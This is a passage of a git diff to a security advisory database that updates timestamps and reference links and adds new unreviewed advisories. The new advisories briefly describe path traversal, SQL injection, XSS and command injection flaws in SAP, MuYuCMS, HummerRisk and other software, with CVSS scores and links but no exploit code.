.../GHSA-325g-f49v-c2hf.json | 6 +- .../GHSA-33jh-2f37-89xc.json | 6 +- .../GHSA-3h23-rfwm-gcx3.json | 6 +- .../GHSA-4268-mm99-gpjc.json | 6 +- .../GHSA-52cp-m58w-wp9x.json | 6 +- .../GHSA-5c5w-4x77-3vjh.json | 6 +- .../GHSA-9wrx-vcj7-gm99.json | 6 +- .../GHSA-g8f3-f559-737f.json | 6 +- .../GHSA-gm3m-q82f-958h.json | 6 +- .../GHSA-hhp2-jq65-cjxx.json | 6 +- .../GHSA-m5wr-8mwj-cqpw.json | 6 +- .../GHSA-r22q-wf27-426v.json | 6 +- .../GHSA-rw74-fqrf-pr2q.json | 6 +- .../GHSA-vjgx-vcpf-hm6w.json | 6 +- .../GHSA-3grc-c2rj-3qj5.json | 40 +++++++++++++ .../GHSA-83rq-88jr-634x.json | 56 +++++++++++++++++++ .../GHSA-cxmx-5wwh-7p77.json | 56 +++++++++++++++++++ .../GHSA-fwq6-2c4r-9g8h.json | 56 +++++++++++++++++++ .../GHSA-mcwp-v5q8-7gcp.json | 29 ++++++++++ .../GHSA-p86v-p9g7-fffw.json | 52 +++++++++++++++++ .../GHSA-rx2f-c6vf-gmg2.json | 52 +++++++++++++++++ .../GHSA-wgpr-jxrq-2m57.json | 56 +++++++++++++++++++ 22 files changed, 467 insertions(+), 14 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json diff --git a/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json b/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json index b0a3d5468777b..df7b952f5c4b4 100644 --- a/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json +++ b/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-325g-f49v-c2hf", - "modified": "2025-12-12T18:30:35Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-12T18:30:35Z", "aliases": [ "CVE-2025-14565" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.703875" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.725464" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json b/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json index 33c88d503ddbb..9f06b5aab7d76 100644 --- a/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json +++ b/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33jh-2f37-89xc", - "modified": "2025-12-13T00:30:26Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-13T00:30:26Z", "aliases": [ "CVE-2025-14582" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.705524" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.714164" + }, { "type": "WEB", "url": "https://www.campcodes.com" diff --git a/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json b/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json index b8de4788c8c04..1ee063fddf061 100644 --- a/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json +++ b/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3h23-rfwm-gcx3", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:18Z", "aliases": [ "CVE-2025-14957" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/binaryen" + }, { "type": "WEB", "url": "https://github.com/oneafter/1204/blob/main/af1" diff --git a/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json b/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json index 8c20c3af1e7be..439c43e4b64b8 100644 --- a/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json +++ b/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4268-mm99-gpjc", - "modified": "2025-12-08T03:31:04Z", + "modified": "2026-02-24T06:31:29Z", "published": "2025-12-08T03:31:04Z", "aliases": [ "CVE-2025-14211" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.700949" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.707937" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json b/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json index 6f49994b33b31..cc4c95325bf0e 100644 --- a/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json +++ b/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-52cp-m58w-wp9x", - "modified": "2025-12-14T18:31:30Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-14T18:31:30Z", "aliases": [ "CVE-2025-14672" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14672" }, + { + "type": "WEB", + "url": "https://gitee.com/gmg137/snap7-rs" + }, { "type": "WEB", "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H8E" diff --git a/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json b/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json index 2265e40c9e0aa..f3ef081be61e2 100644 --- a/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json +++ b/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5c5w-4x77-3vjh", - "modified": "2025-12-19T21:30:19Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T21:30:19Z", "aliases": [ "CVE-2025-14962" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.717640" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.724795" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json b/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json index e9f78be94b25a..780d9232d71e2 100644 --- a/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json +++ b/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9wrx-vcj7-gm99", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:18Z", "aliases": [ "CVE-2025-14955" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/773117aa5472af26fc9f80e608d3386504c3bdb7" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.337591" diff --git a/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json b/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json index 0e188c8a0c186..66e37bd5b4b77 100644 --- a/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json +++ b/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g8f3-f559-737f", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:17Z", "aliases": [ "CVE-2025-14953" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/93a9fd98a8baa94289be3b982028201de4534e32" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.337589" diff --git a/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json b/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json index 53abdaa22149a..2532ad07a3e86 100644 --- a/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json +++ b/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gm3m-q82f-958h", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:17Z", "aliases": [ "CVE-2025-14954" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.337590" diff --git a/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json b/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json index eeb5c71fe0404..a53a6ae58c1eb 100644 --- a/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json +++ b/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hhp2-jq65-cjxx", - "modified": "2025-12-09T00:31:16Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-09T00:31:16Z", "aliases": [ "CVE-2025-14276" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.702649" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.715521" + }, { "type": "WEB", "url": "https://www.yuque.com/yuqueyonghuexlgkz/zepczx/ahygt5u6sgqpk5tt?singleDoc" diff --git a/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json b/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json index 27f42fd1dd6bb..4ca6851d1ac0f 100644 --- a/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json +++ b/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m5wr-8mwj-cqpw", - "modified": "2025-12-18T03:30:17Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-18T03:30:17Z", "aliases": [ "CVE-2025-14856" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.710152" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736164" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json b/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json index 35a1bfed07dd6..7d5d583ce346c 100644 --- a/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json +++ b/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r22q-wf27-426v", - "modified": "2025-12-14T15:30:19Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-14T15:30:18Z", "aliases": [ "CVE-2025-14665" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.714400" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.719220" + }, { "type": "WEB", "url": "https://www.tenda.com.cn" diff --git a/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json b/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json index ce0a3de84e30d..e6aeeaa52e82e 100644 --- a/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json +++ b/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rw74-fqrf-pr2q", - "modified": "2025-12-14T18:31:30Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-14T18:31:30Z", "aliases": [ "CVE-2025-14673" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14673" }, + { + "type": "WEB", + "url": "https://gitee.com/gmg137/snap7-rs" + }, { "type": "WEB", "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H74" diff --git a/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json b/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json index 705bb83b2535b..e3cf939146a8f 100644 --- a/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json +++ b/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vjgx-vcpf-hm6w", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:18Z", "aliases": [ "CVE-2025-14956" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/binaryen/commit/4f52bff8c4075b5630422f902dd92a0af2c9f398" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/binaryen" + }, { "type": "WEB", "url": "https://github.com/oneafter/1204/blob/main/hbf" diff --git a/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json b/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json new file mode 100644 index 0000000000000..7f44aed92b5ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3grc-c2rj-3qj5", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-24314" + ], + "details": "Under certain conditions SAP S/4HANA (Manage Payment Media) allows an authenticated attacker to access information which would otherwise be restricted. This could cause low impact on confidentiality of the application while integrity and availability are not impacted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24314" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3646297" + }, + { + "type": "WEB", + "url": "https://url.sap/sapsecuritypatchday" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json b/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json new file mode 100644 index 0000000000000..ec545a0d406a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83rq-88jr-634x", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2025-15589" + ], + "details": "A vulnerability was determined in MuYuCMS 2.7. Affected is the function delete_dir_file of the file application/admin/controller/Template.php of the component Template Management Page. This manipulation of the argument temn/tp causes path traversal. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15589" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe#proof-of-concept" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.336710" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.336710" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.702489" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json b/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json new file mode 100644 index 0000000000000..2eb0455470f08 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxmx-5wwh-7p77", + "modified": "2026-02-24T06:31:31Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-3070" + ], + "details": "A vulnerability was detected in SourceCodester Modern Image Gallery App 1.0. Affected by this vulnerability is an unknown functionality of the file upload.php. The manipulation of the argument filename results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3070" + }, + { + "type": "WEB", + "url": "https://github.com/tiancesec/CVE/issues/28" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347425" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347425" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757768" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T05:17:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json b/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json new file mode 100644 index 0000000000000..816ca9edf4bde --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwq6-2c4r-9g8h", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-3068" + ], + "details": "A weakness has been identified in itsourcecode Document Management System 1.0. This impacts an unknown function of the file /deluser.php. Executing a manipulation of the argument user2del can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3068" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/cve_submit/issues/4" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347423" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347423" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757742" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json b/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json new file mode 100644 index 0000000000000..2f00150a30807 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcwp-v5q8-7gcp", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2025-15386" + ], + "details": "The Responsive Lightbox & Gallery WordPress plugin before 2.6.1 is vulnerable to an Unauthenticated Stored-XSS attack due to flawed regex replacement rules that can be abused by posting a comment with a malicious link when lightbox for comments are enabled and then approved.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15386" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/fa3a84b6-6d5d-4e10-8587-ae49c127483b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json b/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json new file mode 100644 index 0000000000000..ffd66e3a1952e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p86v-p9g7-fffw", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-3067" + ], + "details": "A vulnerability has been found in HummerRisk up to 1.5.0. This issue affects the function extractTarGZ/extractZip of the file hummer-common/hummer-common-core/src/main/java/com/hummer/common/core/utils/CommandUtils.java of the component Archive Extraction. The manipulation leads to path traversal. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3067" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/11" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347418" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347418" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757763" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json b/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json new file mode 100644 index 0000000000000..cad52f7c99343 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx2f-c6vf-gmg2", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-3066" + ], + "details": "A flaw has been found in HummerRisk up to 1.5.0. This vulnerability affects the function fixedCommand of the file hummer-common/hummer-common-core/src/main/java/com/hummer/common/core/utils/PlatformUtils.java of the component Cloud Compliance Scanning. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3066" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347417" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347417" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757704" + } + ], + 